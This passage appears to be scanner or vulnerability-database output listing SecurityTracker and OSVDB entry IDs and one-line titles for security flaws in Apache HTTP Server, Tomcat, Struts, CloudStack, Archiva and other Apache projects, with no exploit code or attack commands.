15286| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
15287| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
15288| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
15289| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
15290| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
15291| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
15292|
15293| OSVDB - http://www.osvdb.org:
15294| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
15295| [96077] Apache CloudStack Global Settings Multiple Field XSS
15296| [96076] Apache CloudStack Instances Menu Display Name Field XSS
15297| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
15298| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
15299| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
15300| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
15301| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
15302| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
15303| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
15304| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
15305| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
15306| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
15307| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
15308| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
15309| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
15310| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
15311| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
15312| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
15313| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
15314| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
15315| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
15316| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
15317| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
15318| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
15319| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
15320| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
15321| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
15322| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
15323| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
15324| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
15325| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
15326| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
15327| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
15328| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
15329| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
15330| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
15331| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
15332| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
15333| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
15334| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
15335| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
15336| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
15337| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
15338| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
15339| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
15340| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
15341| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
15342| [94279] Apache Qpid CA Certificate Validation Bypass
15343| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
15344| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
15345| [94042] Apache Axis JAX-WS Java Unspecified Exposure
15346| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
15347| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
15348| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
15349| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
15350| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
15351| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
15352| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
15353| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
15354| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
15355| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
15356| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
15357| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
15358| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
15359| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
15360| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
15361| [93541] Apache Solr json.wrf Callback XSS
15362| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
15363| [93521] Apache jUDDI Security API Token Session Persistence Weakness
15364| [93520] Apache CloudStack Default SSL Key Weakness
15365| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
15366| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
15367| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
15368| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
15369| [93515] Apache HBase table.jsp name Parameter XSS
15370| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
15371| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
15372| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
15373| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
15374| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
15375| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
15376| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
15377| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
15378| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
15379| [93252] Apache Tomcat FORM Authenticator Session Fixation
15380| [93172] Apache Camel camel/endpoints/ Endpoint XSS
15381| [93171] Apache Sling HtmlResponse Error Message XSS
15382| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
15383| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
15384| [93168] Apache Click ErrorReport.java id Parameter XSS
15385| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
15386| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
15387| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
15388| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
15389| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
15390| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
15391| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
15392| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
15393| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
15394| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
15395| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
15396| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
15397| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
15398| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
15399| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
15400| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
15401| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
15402| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
15403| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
15404| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
15405| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
15406| [93144] Apache Solr Admin Command Execution CSRF
15407| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
15408| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
15409| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
15410| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
15411| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
15412| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
15413| [92748] Apache CloudStack VM Console Access Restriction Bypass
15414| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
15415| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
15416| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
15417| [92706] Apache ActiveMQ Debug Log Rendering XSS
15418| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
15419| [92270] Apache Tomcat Unspecified CSRF
15420| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
15421| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
15422| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
15423| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
15424| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
15425| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
15426| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
15427| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
15428| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
15429| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
15430| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
15431| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
15432| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
15433| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
15434| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
15435| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
15436| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
15437| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
15438| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
15439| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
15440| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
15441| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
15442| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
15443| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
15444| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
15445| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
15446| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
15447| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
15448| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
15449| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
15450| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
15451| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
15452| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
15453| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
15454| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
15455| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
15456| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
15457| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
15458| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
15459| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
15460| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
15461| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
15462| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
15463| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
15464| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
15465| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
15466| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
15467| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
15468| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
15469| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
15470| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
15471| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
15472| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
15473| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
15474| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
15475| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
15476| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
15477| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
15478| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
15479| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
15480| [86901] Apache Tomcat Error Message Path Disclosure
15481| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
15482| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
15483| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
15484| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
15485| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
15486| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
15487| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
15488| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
15489| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
15490| [85430] Apache mod_pagespeed Module Unspecified XSS
15491| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
15492| [85249] Apache Wicket Unspecified XSS
15493| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
15494| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
15495| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
15496| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
15497| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
15498| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
15499| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
15500| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
15501| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
15502| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
15503| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
15504| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
15505| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
15506| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
15507| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
15508| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
15509| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
15510| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
15511| [83339] Apache Roller Blogger Roll Unspecified XSS
15512| [83270] Apache Roller Unspecified Admin Action CSRF
15513| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
15514| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
15515| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
15516| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
15517| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
15518| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
15519| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
15520| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
15521| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
15522| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
15523| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
15524| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
15525| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
15526| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
15527| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
15528| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
15529| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
15530| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
15531| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
15532| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
15533| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
15534| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
15535| [80300] Apache Wicket wicket:pageMapName Parameter XSS
15536| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
15537| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
15538| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
15539| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
15540| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
15541| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
15542| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
15543| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
15544| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
15545| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
15546| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
15547| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
15548| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
15549| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
15550| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
15551| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
15552| [78331] Apache Tomcat Request Object Recycling Information Disclosure
15553| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
15554| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
15555| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
15556| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
15557| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
15558| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
15559| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
15560| [77593] Apache Struts Conversion Error OGNL Expression Injection
15561| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
15562| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
15563| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
15564| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
15565| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
15566| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
15567| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
15568| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
15569| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
15570| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
15571| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
15572| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
15573| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
15574| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
15575| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
15576| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
15577| [74725] Apache Wicket Multi Window Support Unspecified XSS
15578| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
15579| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
15580| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
15581| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
15582| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
15583| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
15584| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
15585| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
15586| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
15587| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
15588| [73644] Apache XML Security Signature Key Parsing Overflow DoS
15589| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
15590| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
15591| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
15592| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
15593| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
15594| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
15595| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
15596| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
15597| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
15598| [73154] Apache Archiva Multiple Unspecified CSRF
15599| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
15600| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
15601| [72238] Apache Struts Action / Method Names <
15602| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
15603| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
15604| [71557] Apache Tomcat HTML Manager Multiple XSS
15605| [71075] Apache Archiva User Management Page XSS
15606| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
15607| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
15608| [70924] Apache Continuum Multiple Admin Function CSRF
15609| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
15610| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
15611| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
15612| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
15613| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
15614| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
15615| [69520] Apache Archiva Administrator Credential Manipulation CSRF
15616| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
15617| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
15618| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
15619| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
15620| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
15621| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
15622| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
15623| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
15624| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
15625| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
15626| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
15627| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
15628| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
15629| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
15630| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
15631| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
15632| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
15633| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
15634| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
15635| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
